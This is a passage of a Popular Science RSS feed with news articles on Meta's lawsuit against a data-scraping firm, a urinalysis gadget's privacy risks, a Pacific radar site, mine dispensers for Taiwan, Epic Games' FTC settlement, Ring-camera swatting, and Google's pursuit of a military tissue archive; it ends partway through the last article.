Meta sues data-scraping firm for selling user data to LAPD https://www.popsci.com/technology/meta-data-scraping-lawsuit/ Fri, 13 Jan 2023 22:00:00 +0000 https://www.popsci.com/?p=505517
Meta logo on company office building
Voyager Labs' data-scraping tactics affecting over 600,000 users. Deposit Photos

Voyager Labs created fake users to amass info on over 600,000 real people, which it then sold to the LAPD for criminal profiling.

The post Meta sues data-scraping firm for selling user data to LAPD appeared first on Popular Science.

]]>
Meta logo on company office building
Voyager Labs' data-scraping tactics affecting over 600,000 users. Deposit Photos

Meta announced yesterday that it is pursuing legal action against a data scraping-for-hire firm called Voyager Labs for allegedly “improperly” amassing Facebook and Instagram users’ publicly available information, which it then sold to organizations including the Los Angeles Police Department, Meta says. As The Verge and other outlets note, the LAPD then utilized the data trove to compile profiles of potential future criminals. Critics have repeatedly voiced concerns over methodology and algorithms behind this strategy as being reductionist, unethical, and racist.

Public knowledge of Voyager Labs’ tactics can be traced back to November 2021 via a report from The Guardian, but Meta only recently instigated a wholesale ban of the company alongside more than 38,000 fake user profiles from its social media platforms, according to a legal complaint filed on Thursday. Using a proprietary software system, Voyager Labs allegedly launched multiple campaigns utilizing false accounts spread across a diverse computer network in various countries to hide its activity. From there, Meta claims it amassed “profile information, posts, friends lists, photos and comments” from over 600,000 users. Those datasets were then sold to third-party buyers for their own purposes, such as the LAPD.

[Related: Meta will pay $725 million for a single Cambridge Analytica privacy settlement.]

In its legal complaint, Meta alleges that Voyager Labs violated the company’s Terms of Service against fake accounts, alongside unauthorized and automated scraping. Voyager Labs also conducted similar strategies on other platforms including Twitter, Telegram, and YouTube, according to the lawsuit.

“We cannot comment on this aspect of the legal action,” a spokesperson for Meta told PopSci.

Situations such as what allegedly happened with Voyager Labs are often difficult to cope with for even the biggest tech giants like Meta. Legal cases can move notoriously slowly—all the while, the problematic companies can continue their potentially illegal tactics, often emboldened by the perceived inaction. Previously, Meta launched similar legal action against a different data-scraping company, Octopus, for amassing information on over 350,000 Instagram users. 

Meta is seeking a permanent injunction for the company, as well as restitution for “ill-gotten profits in an amount to be proven at trial.” The request does not specify if Meta’s users affected by Voyager Labs’ actions will be included in the compensation.

The post Meta sues data-scraping firm for selling user data to LAPD appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Privacy advocates are worried about a newly unveiled pee-analysis gadget https://www.popsci.com/technology/withings-urinalysis-device-medical-privacy/ Thu, 12 Jan 2023 20:00:00 +0000 https://www.popsci.com/?p=504945
Door open revealing public restroom toilet
There doesn't appear to be anything stopping U-Scan from sharing info with police. Deposit Photos

Consumers should think twice before buying into the splashy new device.

The post Privacy advocates are worried about a newly unveiled pee-analysis gadget appeared first on Popular Science.

]]>
Door open revealing public restroom toilet
There doesn't appear to be anything stopping U-Scan from sharing info with police. Deposit Photos

We may earn revenue from the products available on this page and participate in affiliate programs. Learn more ›

One of the odder, buzzier gadgets to come out of this year’s CES conference was undoubtedly the heath device company Withings’ U-Scan, an in-home, WiFi-connected urinalysis device meant to soon read one’s urine composition for health factors regarding pH balance, nutrition, and even users’ menstrual cycles. Perhaps because of this arguably inevitable turn in the ever-expanding smart home tech industry, many are (understandably) eager to poke fun at the French health tech company’s gadget, but some critics are already voicing serious concerns about the lavatory accessory.

“The U-Scan is a body surveillance device that indefinitely stores your private health data, including information about pregnancy and fertility,” writes Caitlin Seeley George, campaign director for the digital privacy rights advocacy group, Fight for the Future.

[Related: Meta could protect users’ abortion-related messages whenever it wants, advocates say.]

George continued via email with PopSci about the grave ramifications that could befall U-Scan owners—alongside its makers’ potential complicity in prosecution. “In anti-abortion states, your urine logs could qualify as evidence in efforts to criminalize abortion seekers,” George explains.

On Withings’ legal policy page, the company notes that they “may be compelled by the law to disclose your personal data to some authorities or other third parties, such as the the law enforcement or legal authorities.”

“This isn’t innovation: it’s just another surveillance tool cloaked by convenience rhetoric,” she adds.

Smart home health devices and online privacy are increasingly coming to the forefront of privacy discussions, especially following last year’s historic annulment of Roe v Wade by the US Supreme Court. In August, documents surfaced which showed how Facebook’s parent company, Meta, provided Nebraska law enforcement the private messages sent between a mother and her teen daughter as they planned and carried out an at-home abortion past the state’s 20-week limitation.

[Related: What science tells us about abortion bans.]

George notes that it is easy to envision similar situations occurring with data obtained and stored by U-Scan’s software, and reminds consumers that such health information is not always covered by HIPPA regulations. “U-Scan is not concerned with protecting your personal information, and the company’s openness about how it will share data with law enforcement should be enough to stop anyone from using it,” she writes, and criticizes the rise of smart tech sacrificing privacy for the sake of supposed conveience.

“There is nothing convenient about personal health data being hacked or shared with police,” says George.

PopSci has reached out to U-Scan’s makers at Withings about their stance of cooperation with law enforcement. There does not appear to be any mention of the subject on Withings’ data security page.

The post Privacy advocates are worried about a newly unveiled pee-analysis gadget appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
A new radar installation in the Pacific will let US forces look over the horizon https://www.popsci.com/technology/us-building-over-the-horizon-radar-palau/ Thu, 05 Jan 2023 23:00:00 +0000 https://www.popsci.com/?p=503542
A C-130 lands on Angaur Island in Palau in November, 2022.
A C-130 lands on Angaur Island in Palau in November, 2022. US Air Force / Divine Cox

So far, the Department of Defense is being fairly tight-lipped about the project in Palau. Here's what we know.

The post A new radar installation in the Pacific will let US forces look over the horizon appeared first on Popular Science.

]]>
A C-130 lands on Angaur Island in Palau in November, 2022.
A C-130 lands on Angaur Island in Palau in November, 2022. US Air Force / Divine Cox

On December 28, the Department of Defense announced the award of an $118 million contract to build a special kind of radar installation in the Republic of Palau. Palau is a nation in the Pacific, about 800 miles southwest of Guam and about 1,000 miles southeast of Manila. It will, by 2026, be host to the Tactical Mobile Over-the-Horizon Radar, a new sensor about which the military is being fairly tight-lipped.

The late December announcement mentions only the concrete foundations that will support the installation. A February 2018 budget document notes that the Tactical Mobile Over-the-Horizon Radar, or TACMOR, “will support air domain awareness and maritime domain awareness requirements over the Western Pacific region. The project will demonstrate a sub-scaled over-the-horizon radar (OTHR) that is one quarter the size of traditional [Over The Horizon] systems.”

The installation, as outlined, will have two sites. One will be along a northern isthmus of Babeldaob, the largest island in Palau. The other will be on Angaur, an island about 60 miles south. These two sites will need to have communications between them, suggesting that the complex could be one linked sensor array. Site schematics show the Babeldaob location as a transmit site, with Angaur as a receiver site. 

Department of Defense documents, as well as general US planning and policy, increasingly suggest the western Pacific as a potential future battlefield for the United States. Guam, a territorial possession of the United States since the Spanish American war in 1898, routinely houses bombers that may be tasked with flights to North Korea or China. One of the major challenges of fighting in the Pacific is that the ocean is vast, and in any war that lasts more than a few hours (as a nuclear exchange might), being able to find, track, and attack enemy forces will be a vital component to victory.

That desire to see beyond, in order to better fight, is a driver of over-the-horizon radar.

Beyond line of sight

Radar, while capable of seeing far, is a technology bound by the physics of waves traveling in straight lines. A radio wave sent out needs to hit an object in a direct line from where it emanates to reflect back, and the difference between where it was sent and how it returns makes the signal. This is partly why radar is so useful for tracking planes, which travel above the ground and can thus be detected at further distances, without the curve of the Earth in the way. It is also why radar installations are often mounted high above the ground, as every few feet of height added increases how far it can see.

The Cold War drove early research and deployments of over-the-horizon radars, which were used as a way to try and watch for incoming missile and bomber attacks. So how do they typically work? 

One example comes from a Soviet over-the-horizon radar receiver, named Duga, that was built outside of Chernobyl, in Ukraine. Shortwave radio signals sent from transmitter sites in southern Ukraine would bounce off the ionosphere, allowing the signal to travel much further, and would then be detected and interpreted at the Duga site. The Soviet radar signal could be heard on shortwave radios, and radio hobbyists in the United States dubbed it the “woodpecker” for its distinctive pattern.

Another approach to sending radar over the horizon is to use low-frequency signals and send them along the surface, letting diffraction carry the waves further. This surface wave radar has a range of hundreds of kilometers, while techniques bouncing off the ionosphere can perceive the world thousands of kilometers away. 

In Ukraine, the distance between the Duga transmitter and receiver sites is over 300 miles. In Palau, the tactical over-the-horizon radar will have a distance between signal and transmitter of roughly one sixth that. If TACMOR is built on similar principles, the shorter distance between sending and receiving might suggest a short range of surveillance. Duga was designed to warn of nuclear launches. The TACMOR site will instead track different threats, on a different scale.

See the sea

TACMOR appears built for a different kind of role than the globe-spanning over-the-horizon radars of the Cold War. Instead of looking for the first sign of nuclear oblivion, TACMOR will track movements related to battle, and will presumably do so at a fraction of the cost of deploying crewed ships and aircraft patrols to scan the same area.

“A modern OTHR [over-the-horizon radar] on Palau will be able to support space-based and terrestrial-based sensor and weapon systems for the potential cueing and early warning of incoming hypersonic weapons, cruise missiles, ballistic missiles, enemy aircraft, and ships,” reports The War Zone. “Most of all, OTHR allows for persistent monitoring of specific areas that would otherwise require many types of radar systems forward deployed over a huge area on the ground, in the air, and at sea at any given time, which may not even be possible.”

By putting the radar system in Palau, the Department of Defense will be able to increase its awareness of a vast swath of sea in the region, and in turn, keep an eye on an important slice of the Pacific. With luck, the radar will report nothing to worry about, but should danger arrive, having the sensor in place means the Navy and Air Force can respond with advance warning, should they need to. 

The post A new radar installation in the Pacific will let US forces look over the horizon appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Why the US is selling Volcano Mine Dispensers to Taiwan https://www.popsci.com/technology/us-selling-taiwan-volcano-mine-dispenser-systems/ Wed, 04 Jan 2023 21:30:03 +0000 https://www.popsci.com/?p=503137
A Volcano Mine Dispenser in action in Poland in 2020 during an exhibition.
A Volcano Mine Dispenser in action in Poland in 2020 during an exhibition. US Army / Greg Stevens

The systems can quick deploy anti-tank mines across a large field.

The post Why the US is selling Volcano Mine Dispensers to Taiwan appeared first on Popular Science.

]]>
A Volcano Mine Dispenser in action in Poland in 2020 during an exhibition.
A Volcano Mine Dispenser in action in Poland in 2020 during an exhibition. US Army / Greg Stevens

To better defend Taiwan in the face of a potential invasion, the United States is selling it Volcanos. More precisely, the United States is selling Taiwan the Volcano Mine Dispenser, a system that can rapidly hurl anti-tank landmines, creating a dangerous and impassable area for heavy armor. The Volcano is an older system, but its use in Taiwan would be brand-new, indicating the kinds of strategies that Taiwan and the United States are considering when it comes to how to defend the island nation in the future.

Land mines are a defensive weapon, though one that can certainly be used aggressively. Putting a landmine in place imperils all who would pass through the area, forcing attackers to face immediate danger or slow down their advances as they reroute around the hazard. What the Volcano does, specifically, is allow for the defenders to create a minefield rapidly. 

“Using a ground vehicle, a 1,000-meter minefield can be laid in 4 to 12 minutes based on terrain and vehicle speed,” reads an Army description. The Volcano system’s mines can also be deployed by helicopter, and it can deploy anti-personnel mines, but the announcement from the State Department specifically mentions trucks for carrying and mounting the Volcano systems it is selling Taiwan, and mentions anti-tank mines. 

Enemy mine

Every landmine is an explosive designed to detonate in the future. Anti-personnel landmines, as the name suggests, are used to kill people, and are prohibited by international treaties in part because of the threat they pose to civilians during and after war. (The United States is only party to some of the treaties regarding land mines.)

Anti-tank landmines have detonation thresholds that are harder to accidentally set off with anything except a vehicle, and are targeted squarely at the largest and deadliest vehicles on a battlefield. In addition, to ensure that the anti-tank mines are used for battlefield purposes, rather than permanently delineating a fixed border, their detonation fuses can be programmed to not work after a set amount of time. 

“A Soldier-selectable, self-destruct mechanism destroys the mine at the end of its active lifecycle – 4 hours to 15 days – depending on the time selected,” declares the Army.

This fits into the larger role of mines as tools to change how battles are fought, rather than create static fronts. In the announcement authorizing the sale, the mines are referred to not as mines but as “munitions,” the broader category of all explosives fired by weapons. With the ability to cover an area, and then have that area be littered in active explosives for over two weeks, one way to think of the Volcano is as artillery designed to send explosives forward in both space and time. 

Island time

As Russia’s invasion of Ukraine illustrated, landmines can have a major impact on how and where armies fight. Ukraine borders Russia by land, and even before the February 2022 invasion, the country had leftover explosives littering the landscape, posing a threat to life and limb. After the invasion, both sides used explosive barriers to limit how and where their foes could safely move. Placing landmines can be quick, while clearing landmines without loss of life or equipment usually needs specialized tools and time.

Taiwan’s unique position as an island nation gives it a meaningful physical barrier to hostile takeover. Unlike Russia into Ukraine, China cannot simply roll tanks over the border. An invasion of Taiwan, should the government of mainland China decide to undertake it, would have to be an amphibious affair, landing soldiers and vehicles by ship as well as attacking from the sea and sky. 

“I think we’ve been very clear in the United States over multiple administrations, that Taiwan needs to put its self-defense front and center. We think the Chinese put a premium on speed,” said Deputy Secretary of Defense Kath Hicks at a security forum in December.

“And the best speed bump or deterrent to that is really the Taiwan people being able to demonstrate that they can slow that down, let alone to defend against it,” Hicks continued. “And that’s where the Ukraine example, I think, really can give the Chinese pause to see the will of a people combined with capability to stall or even stop a campaign of aggression.”

The Volcano is not the flashiest of tools for stopping an invasion by sea, but it does give Taiwan’s military options for how to stop invading forces once they have landed. By being able to place deadly, explosive barriers to movement where they’re needed, for likely as long as they’re needed, the Volcano can halt and restrict advances. It makes the assault into a mess of impassable terrain, blunting attacks with an eruption of explosive power.

The post Why the US is selling Volcano Mine Dispensers to Taiwan appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
‘Fortnite’ owner agrees to $520 million FTC settlement in messy child privacy case https://www.popsci.com/technology/epic-games-fornite-520-million-ftc-settlement-child-privacy/ Tue, 20 Dec 2022 21:00:00 +0000 https://www.popsci.com/?p=500765
Gamer playing Fortnite on laptop using video game controller
Two separate fines add up to the a record-shattering sum for Epic Games. Tristan Fewings/Getty Images for Hamleys

Epic Games was also accused of engaging in 'dark pattern' in-app purchases schemes.

The post ‘Fortnite’ owner agrees to $520 million FTC settlement in messy child privacy case appeared first on Popular Science.

]]>
Gamer playing Fortnite on laptop using video game controller
Two separate fines add up to the a record-shattering sum for Epic Games. Tristan Fewings/Getty Images for Hamleys

We may earn revenue from the products available on this page and participate in affiliate programs. Learn more ›

Epic Games has agreed to pay over $520 million as part of a multi-record-breaking settlement with the Federal Trade Commission. Per the FTC, the makers behind the massively popular video game, Fortnite, were originally accused of not only tricking players into making unintentional in-game payments, but also violating children’s privacy as defined within the Children’s Online Privacy Protection Act (COPPA). The new Epic Games’ settlement comes without an admission or denial of the FTC’s allegations. 

Although technically free to play, much of Fortnite’s profits stem from in-game purchases for digital perks like character dance moves, virtual concerts, and costumes. The FTC alleges that Epic Games relied on a marketing strategy known as “dark patterns,” which The Wall Street Journal described on Monday as “tactics that trap customers into paying for goods and services and create obstacles to canceling.”

[Related: A parent’s guide to playing Fortnite with your kids.]

Additionally, the FTC argued that Epic Games routinely collected the personal data of children under 13-years-old without their parents’ consent or knowledge through Fortnite, which counts as many as 400 million users globally. According to the esports betting platform, Thunderpick, over a quarter of the game’s players are estimated to reside in the US. Fortnite’s previous live-by-default setting for in-game audio and text chatting is said to have also adversely affected teens and children, who could be subject to harassment, bullying, or predatory behavior.

Epic Games will pay a $275 million penalty over accusations of violating COPPA stipulations, the largest ever fine for an FTC rule violation, alongside $245 million in customer refunds over accusations of its dark pattern strategies—itself the largest refund in a gaming case. As part of the settlement, Epic agreed to what the FTC calls its largest ever administrative order to change a company’s consumer policy. Epic Games adopted strict new default privacy guidelines for children and teens in September 2022, which turned off voice and text communications unless manually changed in Fortnite’s settings. Any previous user data collected by Epic in violation of COPPA regulations must be deleted, unless parents explicitly express consent otherwise.

[Related: Social media scammers made off with $770 million last year.]

According to the FTC’s announcement, employees expressed concern internally regarding Epic Games’ lax safeguards for some of its youngest players as far back as 2017. When the company finally got around to introducing a button disabling voice chat, however, the complaint alleges it was made intentionally difficult to locate.

Correction on December 12, 2022: This article has been updated to reflect Epic Games began defaulting to the highest privacy option for players under the age of 18 in September 2022, not as a direct result of the FTC settlement.

The post ‘Fortnite’ owner agrees to $520 million FTC settlement in messy child privacy case appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Serial ‘swatters’ used Ring cameras to livestream dangerous so-called pranks https://www.popsci.com/technology/ring-camera-swatting-prank-indictment/ Tue, 20 Dec 2022 18:00:00 +0000 https://www.popsci.com/?p=500597
Amazon Ring smart home security camera close-up
The two suspects hacked the Ring accounts of 12 homeowners. Deposit Photos

The indicted allegedly called police to 12 residences, then used Ring cameras to taunt them.

The post Serial ‘swatters’ used Ring cameras to livestream dangerous so-called pranks appeared first on Popular Science.

]]>
Amazon Ring smart home security camera close-up
The two suspects hacked the Ring accounts of 12 homeowners. Deposit Photos

We may earn revenue from the products available on this page and participate in affiliate programs. Learn more ›

A California grand jury indicted two men late last week with orchestrating a “swatting spree” after illegally accessing a dozen Ring home security systems across the country. In November 2020, Kya Christian Nelson, 21, of Wisconsin, and James Thomas Andrew McCarty, 20, of North Carolina obtained private credentials for a number of Yahoo email addresses, which the pair then tested to see if the information corresponded with Ring subscription logins. 

The indictment implies the men then gleaned personal information such as addresses from 12 Ring accounts, and either placed false emergency reports or called local police to those locations, citing fake disturbances. Law enforcement was then dispatched to the unwitting Ring owners’ residences. This dangerous and even occasionally lethal prank is known as “swatting.” Atop the attacks’ logistical and legal consequences, the events can lead to lasting psychological trauma in victims, and have long been a favored form of hate crime harassment.

[Related: Ring camera surveillance puts new pressure on Amazon gig workers.]

As Ars Technica noted on Monday, it still remains unknown how the two men gained the login information. Regardless, Nelson and McCarty then live streamed the ensuing chaos via social media. In one instance cited within the US Attorney’s Office for the Central District of California’s announcement, the pair phoned a police department and posed as a child who claimed their parents were arguing and firing guns in the house following a drunken dispute. Once police arrived at the home, Nelson and McCarty utilized the compromised Ring system’s doorbell speakers to verbally abuse and taunt the responding officers.

The weeklong swatting campaign gained the attention of national news outlets, prompting the FBI to issue a public service announcement urging owners of Ring and other similar smart home security systems to take additional safety measures. Simple habits such as enabling two-factor authentication and choosing complex, unique passwords alongside a password manager have consistently been shown to help deter bad actors attempting to compromise online accounts.

[Related: Amazon’s Ring Nation quietly premieres on cable TV in 35 states.]

If convicted, Nelson and McCarty could face multiple years in federal prison. Ars Technica also reports that a separate indictment was filed against McCarty in November in Arizona for swatting attacks on at least 18 people.

Ring, which was purchased by Amazon in 2018, has faced consistent criticism for its internal security problems. The issues coincide with advocacy groups’ concerns regarding what it calls its fear mongering marketing tactics, under-the-radar data sharing with law enforcement, and most recently, an attempt at a family friendly reality show culled in part from Ring home videos dubbed Ring Nation. A coalition of concerned organizations recently reiterated their call to cancel the series following the conclusion of its first season.

The post Serial ‘swatters’ used Ring cameras to livestream dangerous so-called pranks appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Inside Google’s quest to digitize troops’ tissue samples https://www.popsci.com/technology/google-military-tissue-samples/ Wed, 14 Dec 2022 02:00:00 +0000 https://www.popsci.com/?p=498374
Military photo
imageBROKER/Sigrid Gombert/Getty

DOD staffers have pushed back on Google's mission for exclusive access to veterans’ skin samples, tumor biopsies, and slices of organs.

The post Inside Google’s quest to digitize troops’ tissue samples appeared first on Popular Science.

]]>
Military photo
imageBROKER/Sigrid Gombert/Getty

This article was originally featured on ProPublica.

ProPublica is a Pulitzer Prize-winning investigative newsroom. Sign up for The Big Story newsletter to receive stories like this one in your inbox.

In early February 2016, the security gate at a U.S. military base near Washington, D.C., swung open to admit a Navy doctor accompanying a pair of surprising visitors: two artificial intelligence scientists from Google.

In a cavernous, temperature-controlled warehouse at the Joint Pathology Center, they stood amid stacks holding the crown jewels of the center’s collection: tens of millions of pathology slides containing slivers of skin, tumor biopsies and slices of organs from armed service members and veterans.

Standing with their Navy sponsor behind them, the Google scientists posed for a photograph, beaming.

Mostly unknown to the public, the trove and the staff who study it have long been regarded in pathology circles as vital national resources: Scientists used a dead soldier’s specimen that was archived here to perform the first genetic sequencing of the 1918 Flu.

Google had a confidential plan to turn the collection of slides into an immense archive that — with the help of the company’s burgeoning, and potentially profitable, AI business — could help create tools to aid the diagnosis and treatment of cancer and other diseases. And it would seek first, exclusive dibs to do so.

“The chief concern,” Google’s liaison in the military warned the leaders of the repository, “is keeping this out of the press.”

More than six years later, Google is still laboring to turn this vast collection of human specimens into digital gold.

At least a dozen Defense Department staff members have raised ethical or legal concerns about Google’s quest for service members’ medical data and about the behavior of its military supporters, records reviewed by ProPublica show. Underlying their complaints are concerns about privacy, favoritism and the private use of a sensitive government resource in a time when AI in health care shows both great promise and risk. And some of them worried that Google was upending the center’s own pilot project to digitize its collection for future AI use.

Pathology experts familiar with the collection say the center’s leaders have good reason to be cautious about partnerships with AI companies. “Well designed, correctly validated and ethically implemented [health algorithms] could be game-changing things,” said Dr. Monica E. de Baca, chair of the College of American Pathologists’ Council on Informatics and Pathology Innovation. “But until we figure out how to do that well, I’m worried that — knowingly or unknowingly — there will be an awful lot of snake oil sold.”

When it wasn’t chosen to take part in JPC’s pilot project, Google pulled levers in the upper reaches of the Pentagon and in Congress. This year, after lobbying by Google, staff on the House Armed Services Committee quietly inserted language into a report accompanying the Defense Authorization Act that raises doubts about the pathology center’s modernization efforts while providing a path for the tech giant to land future AI work with the center.

Pathology experts call the JPC collection a national treasure, unique in its age, size and breadth. The archive holds more than 31 million blocks of human tissue and 55 million slides. More recent specimens are linked with detailed patient information, including pathologist annotations and case histories. And the repository holds many examples of “edge cases” — diseases so vanishingly rare that many pathologists never see them.

Google sought to gather so many identifying details about the specimens and patients that the repository’s leaders feared it would compromise patients’ anonymity. Discussions became so contentious in 2017 that the leaders of the JPC broke them off.

In an interview with ProPublica, retired Col. Clayton Simon, the former director of the JPC, said Google wanted more than the pathology center felt it could provide. “Ultimately, even through negotiations, we were unable to find a pathway that we legally could do and ethically should do,” Simon said. “And the partnership dissolved.”

But Google didn’t give up. Last year, the center’s current director, Col. Joel Moncur, in response to questions from DOD lawyers, warned that the actions of Google’s chief research partner in the military “could cause a breach of patient privacy and could lead to a scandal that adversely affects the military.”

Google has told the military that the JPC collection holds the “raw materials” for the most significant biotechnology breakthroughs of this decade — “on par with the Human Genome Project in its potential for strategic, clinical, and economic impact.”

All of that made the cache an alluring target for any company hoping to develop health care algorithms. Enormous quantities of medical data are needed to design algorithmic models that can identify patterns a pathologist might miss — and Google and other companies are in a race to gather them. Only a handful of tech companies have the scale to scan, store and analyze a collection of this magnitude on their own. Companies that have submitted plans to compete for aspects of the center’s modernization project include Amazon Web Services, Cerner Corp. and a host of small AI companies.

But no company has been as aggressive as Google, whose parent company, Alphabet, has previously drawn fire for its efforts to gather and crunch medical data. In the United Kingdom, regulators reprimanded a hospital in 2017 for providing data on more than 1.6 million patients, without their understanding, to Alphabet’s AI unit, DeepMind. In 2019, The Wall Street Journal reported that Google had a secret deal, dubbed “Project Nightingale,” with a Catholic health care system that gave it access to data on millions of patients in 21 states, also without the knowledge of patients or doctors. Google responded to the Journal story in a blog post that stated that patient data “cannot and will not be combined with any Google consumer data.”

In a statement, Ted Ladd, a Google spokesperson, attributed the ethics complaints associated with its efforts to work with the repository to an “inter-agency issue” and a “personnel dispute.”

“We had hoped to enable the JPC to digitize its data and, with its permission, develop computer models that would enable researchers and clinicians to improve diagnosis for cancers and other illnesses,” Ladd said, noting that all of Google’s health care partnerships involve “the strictest controls” over data. “Our customers own and manage their data, and we cannot — and do not — use it for any purpose other than explicitly agreed upon by the customer,” Ladd said.

In response to questions from ProPublica, the JPC said none of its de-identified data would be shared during its modernization process unless it met the ethical, regulatory, and legal approvals needed to ensure it was done in the right way.

“The highest priority of the JPC’s digital transformation is to ensure that any de-identified digital slides are used ethically and in a manner that protects patient privacy and military security,” the JPC said.

But some fear that even these safeguards might not be enough. Steven French, a DOD cloud computing engineer assigned to the project, said he was dismayed by the relentlessness of Google’s advocates in the department. Lost in all their discussions about the speed, scale and cost-saving benefits associated with working with Google seemed to be concerns for the interests of the service members whose tissue was the subject of all this maneuvering, French told ProPublica.

“It felt really bad to me,” French said. “Like a slow crush towards the inevitability of some big tech company monetizing it.”

The JPC certainly does need help from tech companies. Underfunded by Congress and long neglected by the Pentagon, it is vulnerable to offers from well-funded rescuers. In spite of its leaders’ pleas, funding for a full-scale modernization project has never materialized. The pathology center’s aging warehouses have been afflicted with water leaks and unwelcome intruders: a marauding family of raccoons.

The story of the pathology center’s long, contentious battle with Google has never been told before. ProPublica’s account is based on internal emails, presentations and memos, as well as interviews with current and former DOD officials, some of whom asked not to be identified because they were not authorized to discuss the matter or for fear of retribution.

Google’s Private Tour

In December 2015, Google began its courtship of the JPC with a bold, unsolicited proposal. The messenger was a junior naval officer, Lt. Cmdr. Niels Olson.

“I’m working with Google on a project to apply machine learning to medical imaging,” Olson wrote to the leaders of the repository. “And it seems like we are at the stage where we need to figure exactly what JPC has.”

A United States Naval Academy physics major and Tulane medical school graduate, Olson worked as a clinical and anatomical pathology resident at the Naval Medical Center in San Diego.

With digitized specimen slides holding massive amounts of data, pathology seemed ripe for the coming AI revolution in medicine, he believed. Olson’s own urgency was heightened in 2014 when his father was diagnosed with prostate cancer.

That year, Olson teamed up with scientists at Google to train software to recognize suspected cancer cells. Google supplied expertise including AI scientists and high-speed, high-resolution scanners. The endeavor had cleared all privacy and review board hurdles. They were scanning Navy patients’ pathology slides at a furious clip, but they needed a larger data set to validate their findings.

Enter the JPC’s archive. Olson learned about the center in medical school. In his email to its leaders in December 2015, Olson attached Google’s eight-page proposal.

Google offered to start the operation by training algorithms with already digitized data in the repository. And it would do this early work “with no exchange of funds.” These types of partnerships free the private parties from having to undergo a competitive bidding process.

Google promised to do the work in a manner that balanced “privacy and ethical considerations.” The government, under the proposal, would own and control the slides and data.

Olson typed a warning: “This is under a non-disclosure agreement with Google, so I need to ask you, do please handle this information appropriately. The chief concern is keeping this out of the press.”

Senior military and civilian staff at the pathology center reacted with alarm. Dr. Francisco Rentas, the head of the archive’s tissue operations, pushed back against the notion of sharing the data with Google.

“As you know, we have the largest pathology repository in the world and a lot of entities will love to get their hands on it, including Google competitors. How do we overcome that?” Rentas asked in an email.

Other leaders had similar reactions. “My concerns are raised when I’m advised to not disclose what seems to be a contractual relationship to the press,” one of the top managers at the pathology center, Col. Edward Stevens, told Olson. Stevens told Olson that giving Google access to this information without a competitive bid could result in litigation from the company’s competitors. Stevens asked: “Does this need to go through an open-source bid?”

But even with these concerns, Simon, the pathology center’s director, was intrigued enough to continue discussions. He invited Olson and Google to inspect the facility.

The warehouse Olson and the Google scientists entered could have served as a set for the final scene of “Raiders of Lost Ark.”

Pathology slides were stacked in aisle canyons, some towering two stories. The slides were arranged in metal trays and cardboard boxes. To access tissue samples, the repository used a retrieval system similar to those found in dry cleaners. The pathology center had just a handful of working scanners. At the pace they were going, it would take centuries to digitize the entire collection.

One person familiar with the repository likened it to the Library of Alexandria, which held the largest archive of knowledge in the ancient world. Myth held that the library was destroyed in a cataclysmic fire lit by Roman invaders, but historians believe the real killer was gradual decay and neglect over centuries.

The military’s tissue library had already played an important role in the advancement of medical knowledge. Its birth in 1862 as the Army Medical Museum was grisly. In a blandly written order in the midst of the Civil War, the Army surgeon general instructed surgeons “diligently to collect and preserve” all specimens of “morbid anatomy, surgical or medical, which may be regarded as valuable.”

Soon the museum’s curator was digging through battlefield trenches to find “many a putrid heap” of hands, feet and other body parts ravaged by disease and war. He and other doctors shipped the remains to Washington in whiskey-filled casks.

Over the next 160 years, the tissue collection outgrew several headquarters, including Washington’s Ford Theater and a nuclear-bomb-proof building near the White House. But the main mission — identifying, studying and reducing the calamitous impact of illnesses and injuries afflicting service members — has remained unchanged in times of war and peace. Each time a military or veterans’ hospital pathologist sent a tissue sample to the pathology center for a second opinion, it was filed away in the repository.

As the archive expanded, the repository’s prestige grew. Its scientists spurred advances in microscopy, cancer and tropical disease research. An institute pathologist named Walter Reed proved that mosquitoes transmit yellow fever, an important discovery in the history of medicine.

For much of its modern history, in addition to serving military and veterans hospitals, the center also provided civilian consultations. The work with elite teaching hospitals gave the center a luster that helped it attract and retain top pathologists.

Congress and DOD leaders questioned why the military should fund civilian work that could be done elsewhere. In 2005, under the congressionally mandated base closure act, the Pentagon ordered the organization running the repository to shut down. The organization reopened with a different overseer, tasked with a narrower, military-focused mission. Uncertainty about the organization’s future caused many top pathologists to leave.

In its first pitch to the repository’s leaders, Google pointedly mentioned a book-length Institute of Medicine report on the repository that stated that “wide access” to the archive’s materials would promote the “public good.” The biorepository wasn’t living up to its potential, Google said, noting that “no major efforts have been underway to fix the problem.”

Following the tour, a Google scientist prepared a list of clinical, demographic and patient information it sought from the repository. The list included “must haves” — case diagnoses; pathology and radiology images; information on gender and ethnicity; and birth and death dates — as well as “high-value” patient information, including comorbidities, subsequent hospitalizations and cause of death.

This troubled the JPC’s director. “We felt very, very concerned about giving too much data to them,” Simon told ProPublica, “because too much data could identify the patient.”

There were other aspects about Google’s offer that made it “very unfavorable to the federal government,” Simon later told his successor, according to an email reviewed by ProPublica.

In exchange for scanning and digitizing the slide collection at its own expense, Google sought “exclusive access” to the data for at least four years.

The other deal-breaker was Google’s requirement that it be able to charge the government to store and access the digitized information, a huge financial commitment. Simon did not have the authority to commit the government to future payments to a company without authorization from Congress.

Today, Ladd, the Google spokesperson, disputes the claim that its proposal would have been unfavorable to the government. “Our goal was to help the government digitize the data before it physically deteriorates.”

Ladd said Google sought exclusive access to the data during the early stages of the project, so that it could scan the de-identified samples and perform quality-control measures on the data prior to handing it back to the JPC.

Niels Olson, who spearheaded the project for the Navy in 2016, declined requests for interviews with ProPublica. But Jackson Stephens, a friend and lawyer who is representing Olson, said Olson had always followed the Institutional Review Board process and worked to anonymize patient medical data before it was used in research or shared with a third party.

“Niels takes his oath to the Constitution and his Hippocratic oath very seriously,” Stephens said. “He loves science, but his first duty of care is to his patients.”

Google’s relentlessness in 2017, too, spooked the repository’s leaders, according to an email reviewed by ProPublica. Google’s lawyer put “pressure” on the head of tissue operations to sign the agreement, which he declined to do. Leaders of the center became “uncomfortable” and discontinued discussions, according to the DOD email.

Though he banged on doors in the Pentagon and Congress, Simon was not able to convince the Obama administration to include the JPC in then-Vice President Joe Biden’s Cancer Moonshot. Simon left the JPC in 2018, his hopes for a modernization of the library dashed. But then a Pentagon advisory board got wind of the JPC collection, and everything changed.

“The Smartest People on Earth”

